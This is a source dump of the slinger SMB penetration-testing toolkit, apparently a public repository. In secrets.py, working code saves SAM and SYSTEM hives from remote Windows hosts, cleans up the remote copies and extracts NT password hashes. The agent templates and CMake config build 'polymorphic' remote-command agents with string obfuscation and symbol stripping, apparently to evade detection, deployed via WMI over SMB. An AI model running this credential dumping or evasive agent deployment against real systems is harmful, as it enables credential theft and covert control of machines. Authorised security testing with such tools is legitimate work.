├── MANIFEST.in
├── src
│   └── slingerpkg
│       ├── lib
│       │   ├── __init__.py
│       │   ├── plugin_base.py
│       │   ├── process_tree.py
│       │   ├── secrets.py
│       │   ├── error_recovery.py
│       │   ├── named_pipe_client.py
│       │   ├── atexec.py
│       │   ├── agent_crypto.py
│       │   ├── hashdump.py
│       │   └── download_state.py
│       ├── utils
│       │   ├── __init__.py
│       │   ├── logger.py
│       │   ├── printlib.py
│       │   └── common.py
│       ├── var
│       │   ├── __init__.py
│       │   └── config.py
│       ├── automation
│       │   ├── __init__.py
│       │   ├── vars.py
│       │   └── utils.py
│       ├── __init__.py
│       ├── tools
│       │   ├── upx_32.exe
│       │   └── upx_64.exe
│       └── plugins
│           └── system_audit.py
├── mypy.ini
├── .coverage
├── docs
│   ├── assets
│   │   ├── clidocs.jpg
│   │   ├── image.png
│   │   └── slinger-agent.gif
│   ├── agent_demo.md
│   ├── TODO.md
│   └── TECHNICAL_SPEC.md
├── .flake8
├── requirements.txt
├── .gitignore
├── .pre-commit-config.yaml
├── pyproject.toml
├── lib
│   └── agent_templates
│       ├── build_config.cmake
│       ├── obfuscation.h
│       ├── dh_x25519.h
│       ├── command_executor.h
│       └── auth_protocol.h
├── CLAUDE.md
├── .github
│   └── workflows
│       └── cli-flag-standards.yml
├── scripts
│   ├── generate_test_stub.py
│   ├── check_cli_flags.py
│   ├── install_agent_deps.py
│   └── build_script.py
└── LICENSE
/MANIFEST.in:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/src/slingerpkg/lib/__init__.py:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/src/slingerpkg/utils/__init__.py:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/src/slingerpkg/var/__init__.py:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/src/slingerpkg/automation/__init__.py:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/mypy.ini:
--------------------------------------------------------------------------------
1 | [mypy]
2 | ignore_errors = True
3 |
--------------------------------------------------------------------------------
/.coverage:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ghost-ng/slinger/HEAD/.coverage
--------------------------------------------------------------------------------
/src/slingerpkg/__init__.py:
--------------------------------------------------------------------------------
1 | __version__ = "1.10.1"
2 | __package__ = "slinger"
3 |
--------------------------------------------------------------------------------
/docs/assets/clidocs.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ghost-ng/slinger/HEAD/docs/assets/clidocs.jpg
--------------------------------------------------------------------------------
/docs/assets/image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ghost-ng/slinger/HEAD/docs/assets/image.png
--------------------------------------------------------------------------------
/docs/assets/slinger-agent.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ghost-ng/slinger/HEAD/docs/assets/slinger-agent.gif
-------------------------------------------------------------------------------- /src/slingerpkg/tools/upx_32.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ghost-ng/slinger/HEAD/src/slingerpkg/tools/upx_32.exe -------------------------------------------------------------------------------- /src/slingerpkg/tools/upx_64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ghost-ng/slinger/HEAD/src/slingerpkg/tools/upx_64.exe -------------------------------------------------------------------------------- /.flake8: -------------------------------------------------------------------------------- 1 | [flake8] 2 | max-line-length = 100 3 | ignore = F403,F405,F841,F541,E722,E501 4 | exclude = .git,__pycache__,docs/source/conf.py,old,build,dist 5 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | impacket==0.11.0 2 | prompt_toolkit==3.0.41 3 | pycryptodome==3.20.0 4 | setuptools==70.0.0 5 | tabulate==0.8.9 6 | toml 7 | passlib 8 | python-dotenv>=1.0.0 9 | openai>=1.0.0 10 | pexpect>=4.8.0 11 | PyYAML>=6.0 12 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *pycache* 2 | *__pycache__* 3 | tests/integration/htb_find_tests/ 4 | tests/integration/htb_config.py 5 | tests/integration/run_htb_tests.py 6 | tests/integration/README_HTB.md 7 | test_*.py 8 | debug_*.py 9 | dist 10 | build 11 | *egg-info* 12 | .venv 13 | .env 14 | venv/ 15 | ai_test_framework/* 16 | ai_test_framework/test_reports 17 | .pytest_cache 18 | .mypy_cache 19 | -------------------------------------------------------------------------------- /src/slingerpkg/automation/vars.py: -------------------------------------------------------------------------------- 1 | import re 2 | from unittest.mock import MagicMock 3 | 4 | from slingerpkg.utils.cli import extract_commands_and_args, setup_cli_parser 5 | 6 | ANSI = r"\x1b\[[0-9;]*[A-Za-z]" 7 | PROMPT = re.compile(rf"(?:{ANSI})*\[sl\].*?> ") 8 | 9 | mock_client = MagicMock() 10 | parser = setup_cli_parser(mock_client) 11 | COMMAND_LIST = ", ".join(extract_commands_and_args(parser).keys()) 12 | -------------------------------------------------------------------------------- /docs/agent_demo.md: -------------------------------------------------------------------------------- 1 | # Slinger Cooperative Agent Demo 2 | 3 | This video demonstrates the Slinger cooperative agent system in action, showing agent deployment, execution, and management. 4 | 5 | ![Slinger Agent Demo](assets/slinger-agent.gif) 6 | 7 | ## What You'll See 8 | 9 | - Building polymorphic C++ agents with encryption 10 | - Deploying agents via WMI over SMB 11 | - Establishing encrypted named pipe connections 12 | - Executing commands through the agent 13 | - Agent lifecycle management (check, kill, remove) 14 | 15 | ## Getting Started 16 | 17 | See the [main README](README.md#cooperative-agent-system) for installation and usage instructions. 
18 | -------------------------------------------------------------------------------- /src/slingerpkg/automation/utils.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | 3 | 4 | def extract_commands_and_args(parser: argparse.ArgumentParser) -> dict: 5 | """ 6 | Walk an argparse parser built by slingerpkg.utils.cli.setup_cli_parser(...) 7 | and return a dict of {command_name: {...}} for every sub‐command. 8 | """ 9 | commands: dict = {} 10 | for action in parser._actions: 11 | if isinstance(action, argparse._SubParsersAction): 12 | for cmd, subp in action.choices.items(): 13 | desc = getattr(subp, "description", "") 14 | commands[cmd] = {"description": desc, "arguments": []} 15 | for sa in subp._actions: 16 | if isinstance(sa, argparse._StoreAction): 17 | commands[cmd]["arguments"].append( 18 | { 19 | "name": sa.dest, 20 | "help": sa.help, 21 | "choices": sa.choices, 22 | "default": sa.default, 23 | "required": getattr(sa, "required", False), 24 | } 25 | ) 26 | return commands 27 | -------------------------------------------------------------------------------- /src/slingerpkg/lib/plugin_base.py: -------------------------------------------------------------------------------- 1 | # plugin_base.py 2 | import argparse 3 | import importlib 4 | import os 5 | 6 | 7 | def load_plugins(plugin_dirs, client): 8 | plugins = [] 9 | for plugin_dir in plugin_dirs: 10 | for filename in os.listdir(plugin_dir): 11 | if filename.endswith(".py"): 12 | spec = importlib.util.spec_from_file_location( 13 | "module.name", os.path.join(plugin_dir, filename) 14 | ) 15 | module = importlib.util.module_from_spec(spec) 16 | spec.loader.exec_module(module) 17 | for obj in vars(module).values(): 18 | if ( 19 | isinstance(obj, type) 20 | and issubclass(obj, PluginBase) 21 | and obj is not PluginBase 22 | ): 23 | plugins.append(obj(client)) 24 | return plugins 25 | 26 | 27 | class PluginBase: 28 | def __init__(self, client, *args, **kwargs): 29 | super().__init__(*args, **kwargs) 30 | self.client = client 31 | 32 | def get_parser(self): 33 | parser = argparse.ArgumentParser(add_help=False) 34 | return parser 35 | 36 | def run(self, args): 37 | raise NotImplementedError 38 | -------------------------------------------------------------------------------- /.pre-commit-config.yaml: -------------------------------------------------------------------------------- 1 | repos: 2 | - repo: https://github.com/pre-commit/pre-commit-hooks 3 | rev: v4.6.0 4 | hooks: 5 | - id: trailing-whitespace 6 | - id: end-of-file-fixer 7 | - id: check-yaml 8 | - id: check-added-large-files 9 | - id: check-json 10 | - id: check-toml 11 | - id: check-merge-conflict 12 | - id: debug-statements 13 | - id: mixed-line-ending 14 | 15 | - repo: https://github.com/psf/black 16 | rev: 24.10.0 17 | hooks: 18 | - id: black 19 | language_version: python3 20 | args: [--line-length=100] 21 | 22 | - repo: https://github.com/PyCQA/flake8 23 | rev: 7.1.1 24 | hooks: 25 | - id: flake8 26 | args: [--max-line-length=100, --extend-ignore=E203] 27 | exclude: ^(research/|src/debug_scripts/|build_script\.py|src/run_agents\.py) 28 | 29 | - repo: https://github.com/pre-commit/mirrors-mypy 30 | rev: v1.13.0 31 | hooks: 32 | - id: mypy 33 | additional_dependencies: [ 34 | types-setuptools, 35 | types-toml, 36 | types-requests, 37 | types-tabulate 38 | ] 39 | args: [ 40 | --ignore-missing-imports, 41 | --no-strict-optional, 42 | --disable-error-code=name-defined, 43 | --disable-error-code=attr-defined, 44 | 
--disable-error-code=var-annotated, 45 | --disable-error-code=no-redef 46 | ] 47 | exclude: ^(research/|src/debug_scripts/) 48 | 49 | # Disabled temporarily - causes CI failures due to missing tests 50 | # - repo: local 51 | # hooks: 52 | # - id: test-coverage-check 53 | # name: Check test coverage for new commands 54 | # entry: python tests/test_coverage_validator.py 55 | # language: system 56 | # pass_filenames: false 57 | # files: ^src/slingerpkg/utils/cli\.py$ 58 | -------------------------------------------------------------------------------- /src/slingerpkg/utils/logger.py: -------------------------------------------------------------------------------- 1 | import logging 2 | from logging.handlers import TimedRotatingFileHandler 3 | import os 4 | from datetime import datetime 5 | from traceback import format_exception 6 | 7 | 8 | class SlingerLogger: 9 | """ 10 | A logger class that sets up a daily rotating file logger. 11 | Attributes: 12 | logger (logging.Logger): The logger instance. 13 | Methods: 14 | __init__(log_folder, log_file_basename): 15 | Initializes the SlingerLogger with the specified log folder and log file base name. 16 | get_logger(): 17 | Returns the logger instance. 18 | """ 19 | 20 | def __init__(self, log_folder, log_file_basename): 21 | # Ensure the log folder exists 22 | os.makedirs(log_folder, exist_ok=True) 23 | 24 | # Full path for the log file with the base name 25 | log_file_path = os.path.join(log_folder, log_file_basename) 26 | 27 | # Set up the logger 28 | self.logger = logging.getLogger("DailyFileLogger") 29 | self.logger.setLevel(logging.DEBUG) 30 | 31 | # Create a handler for writing logs to a file with daily rotation 32 | handler = TimedRotatingFileHandler( 33 | log_file_path, when="midnight", interval=1, backupCount=7 34 | ) 35 | handler.suffix = "%Y-%m-%d.log" # Suffix for the log file 36 | handler.setFormatter(logging.Formatter("%(asctime)s - %(levelname)s - %(message)s")) 37 | 38 | self.logger.addHandler(handler) 39 | 40 | def get_logger(self): 41 | return self.logger 42 | 43 | 44 | def error_logging(e): 45 | # e is sys.exc_info() 46 | exc_type, exc_value, exc_traceback = e 47 | tb_lines = format_exception(exc_type, exc_value, exc_traceback) 48 | error_message = "".join(tb_lines) 49 | if "NoneType" in error_message: 50 | error_message = "" 51 | return error_message 52 | -------------------------------------------------------------------------------- /pyproject.toml: -------------------------------------------------------------------------------- 1 | [build-system] 2 | requires = [ "setuptools", "wheel",] 3 | build-backend = "setuptools.build_meta" 4 | 5 | [project] 6 | name = "slinger" 7 | version = "1.10.1" 8 | description = "An impacket swiss army knife (sort of)" 9 | readme = "README.md" 10 | keywords = [ "smb", "impacket", "penetration-testing", "windows", "agent", "cooperative",] 11 | classifiers = [ "Development Status :: 4 - Beta", "Environment :: Console", "Intended Audience :: Information Technology", "License :: OSI Approved :: MIT License", "Operating System :: POSIX :: Linux", "Operating System :: Microsoft :: Windows", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Topic :: Security", "Topic :: System :: Systems Administration",] 12 | dependencies = [ "impacket==0.11.0", "prompt_toolkit==3.0.41", "pycryptodome==3.20.0", "setuptools==70.0.0", "tabulate==0.8.9", "toml", "passlib", "python-dotenv>=1.0.0", 
"openai>=1.0.0", "pexpect>=4.8.0", "PyYAML>=6.0",] 13 | requires-python = ">=3.10" 14 | [[project.authors]] 15 | name = "ghost-ng" 16 | email = "ghost-ng@outlook.com" 17 | 18 | [project.optional-dependencies] 19 | dev = [ "pytest>=7.4.0", "pytest-cov>=4.1.0", "pytest-mock>=3.11.1", "pytest-asyncio>=0.21.1", "pytest-timeout>=2.1.0", "black>=23.7.0", "flake8>=6.1.0", "mypy>=1.4.1", "pre-commit>=3.3.3",] 20 | 21 | [project.license] 22 | file = "LICENSE" 23 | 24 | [project.scripts] 25 | slinger = "slingerpkg.slinger:main" 26 | slinger-setup-agent = "slingerpkg.scripts.install_agent_deps:main" 27 | 28 | [project.urls] 29 | Homepage = "https://github.com/ghost-ng/slinger" 30 | Repository = "https://github.com/ghost-ng/slinger" 31 | Documentation = "https://github.com/ghost-ng/slinger#readme" 32 | "Bug Tracker" = "https://github.com/ghost-ng/slinger/issues" 33 | 34 | [tool.setuptools.package-data] 35 | slingerpkg = [ "plugins/*",] 36 | 37 | [tool.setuptools.packages.find] 38 | where = [ "src",] 39 | -------------------------------------------------------------------------------- /src/slingerpkg/var/config.py: -------------------------------------------------------------------------------- 1 | from pathlib import Path 2 | from slingerpkg import __version__, __package__ 3 | 4 | 5 | def get_main_package_dir(): 6 | current_dir = Path(__file__).resolve().parent 7 | while current_dir != current_dir.root: 8 | # Check if it contains a top-level __init__.py (indicating it's a package) 9 | init_file = (Path(__file__).parent.parent / "__init__.py").resolve() 10 | if init_file.exists(): 11 | return current_dir / "src" / "slingerpkg" 12 | current_dir = current_dir.parent 13 | 14 | raise FileNotFoundError("Main package directory not found.") 15 | 16 | 17 | plugin_dir = get_main_package_dir() / "plugins" 18 | 19 | config_vars = [ 20 | {"Name": "Debug", "Value": False, "Description": "Enable debug messages", "Type": "bool"}, 21 | { 22 | "Name": "Logs_Folder", 23 | "Value": "~/.slinger/logs", 24 | "Description": "Folder to store history files", 25 | "Type": "str", 26 | }, 27 | { 28 | "Name": "History_File", 29 | "Value": "~/.slinger/history", 30 | "Description": "History file location", 31 | "Type": "str", 32 | }, 33 | { 34 | "Name": "Codec", 35 | "Value": "utf-8", 36 | "Description": "Codec to use for print decoding", 37 | "Type": "str", 38 | }, 39 | { 40 | "Name": "Plugin_Folders", 41 | "Value": ["~/.slinger/plugins", plugin_dir], 42 | "Description": "Folder to store plugins", 43 | "Type": "str", 44 | }, 45 | { 46 | "Name": "Verbose", 47 | "Value": False, 48 | "Description": "Enable verbose output for operations", 49 | "Type": "bool", 50 | }, 51 | { 52 | "Name": "Extra_Prompt", 53 | "Value": "", 54 | "Description": "Extra prompt to display in CLI", 55 | "Type": "str", 56 | }, 57 | { 58 | "Name": "Timeout", 59 | "Value": 86400, 60 | "Description": "Global SMB connection timeout in seconds (default: 24 hours)", 61 | "Type": "int", 62 | }, 63 | ] 64 | 65 | logwriter = None 66 | version = __version__ 67 | program_name = __package__ 68 | -------------------------------------------------------------------------------- /src/slingerpkg/plugins/system_audit.py: -------------------------------------------------------------------------------- 1 | # my_plugin.py 2 | from slingerpkg.lib.plugin_base import PluginBase # required 3 | import argparse # required 4 | from slingerpkg.utils.printlib import * # required, use pre-defined print functions 5 | 6 | from slingerpkg.utils.common import tee_output # optional but cool 7 | 8 
| plugin_name = "System Audit" 9 | author_name = "ghost-ng" 10 | author_meta = "https://github.com/ghost-ng/" 11 | credits = "iamSiddhartha" 12 | version = "1.0" 13 | 14 | 15 | class MyPlugin(PluginBase): 16 | # Name 17 | name = plugin_name # required 18 | author_block = { 19 | "name": author_name, 20 | "meta": author_meta, 21 | "credits": credits, 22 | "version": version, 23 | } # required 24 | 25 | def get_parser(self): # required 26 | # define a new subparser to return to merge with the main parser 27 | parser = argparse.ArgumentParser(add_help=False) # required 28 | subparsers = parser.add_subparsers(dest="command") # required 29 | plugincmd_parser = subparsers.add_parser( 30 | "audit", help="Runs through typical system audit functions" 31 | ) # required 32 | plugincmd_parser.add_argument("-s", "--save", help="Save to file") 33 | plugincmd_parser.set_defaults(func=self.run) # required entry point 34 | return parser 35 | 36 | def run(self, args): # required 37 | print_block(f"Running System Audit") 38 | 39 | # Dictionary mapping audit actions to their corresponding method calls 40 | audit_dict = { 41 | "System Info": self.client.enum_info, 42 | "Other Info": self.client.info, 43 | "IP Config": self.client.ipconfig, 44 | "Hostname": self.client.hostname, 45 | "Environment Variables": self.client.show_env, 46 | "System Logons": self.client.enum_logons, 47 | "Server Disk Info": self.client.enum_server_disk, 48 | "Sessions": self.client.who, 49 | "Net Shares": self.client.list_shares, 50 | "Enum Services": self.client.enum_services, 51 | "Enum Processes": self.client.show_process_list, 52 | } 53 | 54 | with tee_output(args.save): 55 | # Iterate through the dictionary and execute each function 56 | for key, func in audit_dict.items(): 57 | print_log() 58 | print_block(f"{key}", color=colors.BLUE) 59 | try: 60 | result = func() 61 | if result: 62 | print_log(f"{key} Result: {result}") 63 | except Exception as e: 64 | print_log(f"Error while executing {key}: {str(e)}") 65 | 66 | print_block(f"System Audit Complete", color=colors.YELLOW) 67 | -------------------------------------------------------------------------------- /lib/agent_templates/build_config.cmake: -------------------------------------------------------------------------------- 1 | # CMake configuration for polymorphic agent builds 2 | cmake_minimum_required(VERSION 3.15) 3 | project(SlingerAgent) 4 | 5 | set(CMAKE_CXX_STANDARD 17) 6 | set(CMAKE_CXX_STANDARD_REQUIRED ON) 7 | 8 | # Platform detection 9 | if(CMAKE_SIZEOF_VOID_P EQUAL 8) 10 | set(ARCH_BITS 64) 11 | set(ARCH_SUFFIX "x64") 12 | else() 13 | set(ARCH_BITS 32) 14 | set(ARCH_SUFFIX "x86") 15 | endif() 16 | 17 | # Compiler-specific optimizations and obfuscation 18 | if(MSVC) 19 | # MSVC specific flags for obfuscation 20 | set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /O2 /Ob2 /GL /LTCG") 21 | set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /GS- /Gy /Gw") 22 | # Remove debug information 23 | set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} /DNDEBUG") 24 | # Link time optimization 25 | set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} /LTCG /OPT:REF /OPT:ICF") 26 | elseif(GNU) 27 | # GCC/MinGW specific flags 28 | set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -O3 -ffunction-sections -fdata-sections") 29 | set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fno-stack-protector -fno-exceptions") 30 | set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -Wl,--gc-sections -s") 31 | endif() 32 | 33 | # Source files 34 | set(AGENT_SOURCES 35 | agent_main.cpp 36 | obfuscation.h 37 | pipe_core.h 38 | 
command_executor.h 39 | ) 40 | 41 | # Create executable with obfuscated name 42 | set(EXECUTABLE_NAME "slinger_agent_${ARCH_SUFFIX}") 43 | 44 | # Add polymorphic build options 45 | option(ENABLE_ENCRYPTION "Enable polymorphic encryption" ON) 46 | option(RANDOMIZE_LAYOUT "Randomize code layout" ON) 47 | option(OBFUSCATE_STRINGS "Obfuscate string literals" ON) 48 | 49 | if(ENABLE_ENCRYPTION) 50 | add_definitions(-DENABLE_POLYMORPHIC_ENCRYPTION) 51 | endif() 52 | 53 | if(RANDOMIZE_LAYOUT) 54 | add_definitions(-DRANDOMIZE_CODE_LAYOUT) 55 | endif() 56 | 57 | if(OBFUSCATE_STRINGS) 58 | add_definitions(-DOBFUSCATE_ALL_STRINGS) 59 | endif() 60 | 61 | # Generate unique build ID for polymorphic encryption 62 | string(TIMESTAMP BUILD_ID "%Y%m%d%H%M%S") 63 | math(EXPR RANDOM_SEED "${BUILD_ID} % 65536") 64 | add_definitions(-DBUILD_SEED=${RANDOM_SEED}) 65 | 66 | # Create the agent executable 67 | add_executable(${EXECUTABLE_NAME} ${AGENT_SOURCES}) 68 | 69 | # Link required Windows libraries 70 | if(WIN32) 71 | target_link_libraries(${EXECUTABLE_NAME} PRIVATE 72 | kernel32 73 | user32 74 | advapi32 75 | shell32 76 | ) 77 | endif() 78 | 79 | # Set output directory 80 | set_target_properties(${EXECUTABLE_NAME} PROPERTIES 81 | RUNTIME_OUTPUT_DIRECTORY "${CMAKE_BINARY_DIR}/bin" 82 | OUTPUT_NAME "agent_${RANDOM_SEED}_${ARCH_SUFFIX}" 83 | ) 84 | 85 | # Custom commands for polymorphic builds 86 | add_custom_command(TARGET ${EXECUTABLE_NAME} POST_BUILD 87 | COMMAND ${CMAKE_COMMAND} -E echo "Built polymorphic agent: ${EXECUTABLE_NAME}" 88 | COMMAND ${CMAKE_COMMAND} -E echo "Architecture: ${ARCH_BITS}-bit" 89 | COMMAND ${CMAKE_COMMAND} -E echo "Build seed: ${RANDOM_SEED}" 90 | ) 91 | 92 | # Install target 93 | install(TARGETS ${EXECUTABLE_NAME} 94 | RUNTIME DESTINATION bin 95 | ) 96 | -------------------------------------------------------------------------------- /src/slingerpkg/lib/process_tree.py: -------------------------------------------------------------------------------- 1 | from collections import defaultdict 2 | 3 | 4 | def print_process_tree(processes, verbose=False): 5 | """ 6 | Given a dictionary of processes keyed by PID (each with 'Name', 'PID', 'PPID', etc.), 7 | print an ASCII tree where processes are nested under their parent (by PPID). 8 | 9 | If a process is orphaned (its PPID chain does not lead to a valid root), 10 | it will be attached to the root level along with the main tree. 11 | """ 12 | 13 | # Build mapping: PPID -> list of child processes. 14 | children = defaultdict(list) 15 | for proc in processes.values(): 16 | children[proc["PPID"]].append(proc) 17 | for ppid in children: 18 | children[ppid].sort(key=lambda x: x["PID"]) 19 | 20 | # Recursive function to print a branch from a given PID. 
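    # Example of the rendered shape (process names and PIDs below are illustrative only,
    # matching the non-verbose format string used in print_branch):
    #   ├── System (PID: 4 | PPID: 0)
    #   │   └── smss.exe (PID: 348 | PPID: 4)
    #   └── Registry (PID: 96 | PPID: 0)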
21 | def print_branch(pid, prefix="", visited=None): 22 | if visited is None: 23 | visited = set() 24 | if pid in visited: 25 | # print(prefix + "* [Cycle detected] (PID: {})".format(pid)) 26 | return 27 | visited.add(pid) 28 | for i, proc in enumerate(children.get(pid, [])): 29 | if i == len(children[pid]) - 1: 30 | connector = "└── " 31 | new_prefix = prefix + " " 32 | else: 33 | connector = "├── " 34 | new_prefix = prefix + "│ " 35 | if verbose: 36 | print( 37 | prefix 38 | + connector 39 | + f'{proc["Name"]} (PID: {proc["PID"]} | PPID: {proc["PPID"]} | Handles: {proc["Handles"]} | Threads: {proc["Threads"]})' 40 | ) 41 | else: 42 | print( 43 | prefix 44 | + connector 45 | + f'{proc["Name"]} (PID: {proc["PID"]} | PPID: {proc["PPID"]})' 46 | ) 47 | if proc["PID"] != proc["PPID"]: 48 | print_branch(proc["PID"], new_prefix, visited.copy()) 49 | 50 | # Determine reachable processes: those connected (via PPID chain) to a valid root (PPID 0). 51 | reachable = set() 52 | 53 | def mark_reachable(pid, visited=None): 54 | if visited is None: 55 | visited = set() 56 | if pid in visited: 57 | return 58 | visited.add(pid) 59 | reachable.add(pid) 60 | for proc in children.get(pid, []): 61 | if proc["PID"] != proc["PPID"]: 62 | mark_reachable(proc["PID"], visited.copy()) 63 | 64 | mark_reachable(0) 65 | 66 | # Collect orphan roots: processes not reachable from 0. 67 | orphan_roots = [ 68 | proc 69 | for proc in processes.values() 70 | if proc["PID"] not in reachable 71 | and (proc["PPID"] in reachable or proc["PPID"] not in processes) 72 | ] 73 | 74 | # Print main tree starting from PPID 0. 75 | 76 | if 0 in children: 77 | print_branch(0, "") 78 | else: 79 | print("No root processes with PPID 0 found.") 80 | 81 | # Instead of a separate orphan section, attach orphan roots at the root level. 
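    # "Orphan roots" are processes that are not reachable from PID 0, usually because
    # their parent PID is missing from the snapshot; rather than being dropped, each one
    # starts its own branch at the root level below.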
82 | if orphan_roots: 83 | # print("\nAdditional Orphan Branches attached to root:") 84 | printed_orphans = set() 85 | for proc in sorted(orphan_roots, key=lambda x: x["PID"]): 86 | if proc["PID"] in printed_orphans: 87 | continue 88 | if verbose: 89 | print( 90 | f'----{proc["Name"]} (PID: {proc["PID"]} | PPID: {proc["PPID"]} | Handles: {proc["Handles"]} | Threads: {proc["Threads"]})' 91 | ) 92 | else: 93 | print(f'----{proc["Name"]} (PID: {proc["PID"]} | PPID: {proc["PPID"]})') 94 | print_branch(proc["PID"], " ") 95 | 96 | def mark_printed(pid): 97 | printed_orphans.add(pid) 98 | for child in children.get(pid, []): 99 | if child["PID"] != child["PPID"]: 100 | mark_printed(child["PID"]) 101 | 102 | mark_printed(proc["PID"]) 103 | -------------------------------------------------------------------------------- /src/slingerpkg/lib/secrets.py: -------------------------------------------------------------------------------- 1 | from binascii import hexlify, unhexlify 2 | from shutil import which 3 | from slingerpkg.utils.printlib import * 4 | from slingerpkg.lib.hashdump import * 5 | from slingerpkg.utils.common import run_local_command 6 | 7 | 8 | class secrets: 9 | def __init__(self): 10 | print_debug("WinReg Module Loaded!") 11 | self._bootKey = b"" 12 | self._samKey = b"" 13 | 14 | def getBootKey(self): 15 | self._bootKey = b"" 16 | print_debug("Getting BootKey") 17 | bootKey = b"" 18 | self.setup_dce_transport() 19 | self.dce_transport._connect("winreg") 20 | bootKey = self.dce_transport._get_boot_key() 21 | transforms = [8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7] 22 | 23 | bootKey = unhexlify(bootKey) 24 | 25 | for i in range(len(bootKey)): 26 | self._bootKey += bootKey[transforms[i] : transforms[i] + 1] 27 | 28 | print_good("Target system bootKey: 0x%s" % hexlify(self._bootKey).decode("utf-8")) 29 | 30 | def saveHive(self, hiveName): 31 | print_debug(f"Saving Hive {hiveName}") 32 | self.setup_dce_transport() 33 | self.dce_transport._connect("winreg") 34 | remoteFileName = self.dce_transport._save_hive(hiveName) 35 | if remoteFileName is None: 36 | print_bad(f"Failed to save {hiveName} hive") 37 | return None, None 38 | saveName = "/tmp/" + hiveName + ".hive" 39 | if self.share.upper() == "C$": 40 | remotePath = f"\\Windows\\Temp\\{remoteFileName}" 41 | self.download(remotePath, saveName) 42 | elif self.share.upper() == "ADMIN$": 43 | remotePath = f"\\Temp\\{remoteFileName}" 44 | self.download(remotePath, saveName) 45 | 46 | return remotePath, saveName 47 | 48 | def secretsdump(self, args): 49 | try: 50 | if self.share.upper() != "C$" and self.share.upper() != "ADMIN$": 51 | print_warning("You need to connect to C$ or ADMIN$ to dump hashes") 52 | return 53 | except AttributeError: 54 | print_warning("You need to connect to C$ or ADMIN$ to dump hashes") 55 | return 56 | print_info("Dumping secrets...") 57 | remotePath_SYSTEM, localPath_SYSTEM = self.saveHive("SYSTEM") 58 | self.delete(remotePath_SYSTEM) 59 | print_info("Saving SAM Hive") 60 | remotePath_SAM, localPath_SAM = self.saveHive("SAM") 61 | self.delete(remotePath_SAM) 62 | # determine which command is avilable 63 | bins = ["secretsdump.py", "secretsdump", "impacket-secretsdump", "impacket-secretsdump.py"] 64 | binaryName = None 65 | for bin in bins: 66 | if which(bin): 67 | binaryName = which(bin) 68 | if binaryName is None: 69 | binaryName = "secretsdump.py" # local copy 70 | print_info(f"Using {os.path.basename(binaryName)} to dump secrets") 71 | run_local_command(f"{binaryName} -sam {localPath_SAM} -system 
{localPath_SYSTEM} LOCAL") 72 | 73 | def hashdump(self, args): 74 | hashTable = [] 75 | share = self.share 76 | try: 77 | if share.upper() != "C$" and share.upper() != "ADMIN$": 78 | print_warning("You need to connect to C$ or ADMIN$ to dump hashes") 79 | return 80 | except AttributeError: 81 | print_warning("You need to connect to C$ or ADMIN$ to dump hashes") 82 | return 83 | 84 | print_info("Dumping hashes...") 85 | # self.getBootKey() 86 | print_info("Saving SYSTEM Hive") 87 | remotePath_SYSTEM, localPath_SYSTEM = self.saveHive("SYSTEM") 88 | self.delete(remotePath_SYSTEM) 89 | print_info("Saving SAM Hive") 90 | remotePath_SAM, localPath_SAM = self.saveHive("SAM") 91 | self.delete(remotePath_SAM) 92 | sys_key = get_bootkey(localPath_SYSTEM) 93 | print(f"BootKey: {sys_key.hex()}") 94 | # Initialize registry access function 95 | h = RegHive(localPath_SAM) 96 | sam_key = get_hbootkey(h, sys_key) 97 | print(f"SamKey: {sam_key.hex()}") 98 | 99 | # list users and hashes 100 | hashTable = get_hashes(h, sam_key) 101 | # print(hashTable) 102 | # Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e119ec7919cc3b1d7ad859697cfa659::: 103 | for user in hashTable: 104 | print(f"{user['Username']}:{user['RID']}:{user['LMHash']}:{user['NTHash']}:::") 105 | -------------------------------------------------------------------------------- /lib/agent_templates/obfuscation.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Cross-platform compatibility layer 4 | #ifdef _WIN32 5 | #include 6 | #else 7 | #include 8 | #include 9 | #include 10 | #endif 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | namespace obfuscated { 17 | 18 | // Compile-time random seed generation 19 | constexpr uint32_t compile_seed() { 20 | #ifdef BUILD_SEED 21 | return BUILD_SEED; 22 | #else 23 | #error "BUILD_SEED must be defined at compile time via CMake -DBUILD_SEED=" 24 | #endif 25 | } 26 | 27 | // Runtime random seed for additional entropy 28 | inline uint32_t random_seed() { 29 | static uint32_t seed = static_cast( 30 | std::chrono::high_resolution_clock::now().time_since_epoch().count() 31 | ) ^ compile_seed(); 32 | seed = seed * 1103515245 + 12345; 33 | return seed; 34 | } 35 | 36 | // Derive encryption key from index and base seed 37 | constexpr uint8_t derive_key(size_t index) { 38 | return static_cast((compile_seed() * 0x9E3779B9 + index) & 0xFF); 39 | } 40 | 41 | // Compile-time string obfuscation 42 | template 43 | struct ObfuscatedString { 44 | char data[N]; 45 | 46 | constexpr ObfuscatedString(const char (&str)[N]) : data{} { 47 | for (size_t i = 0; i < N - 1; ++i) { 48 | data[i] = str[i] ^ derive_key(i + KEY); 49 | } 50 | data[N - 1] = '\0'; 51 | } 52 | 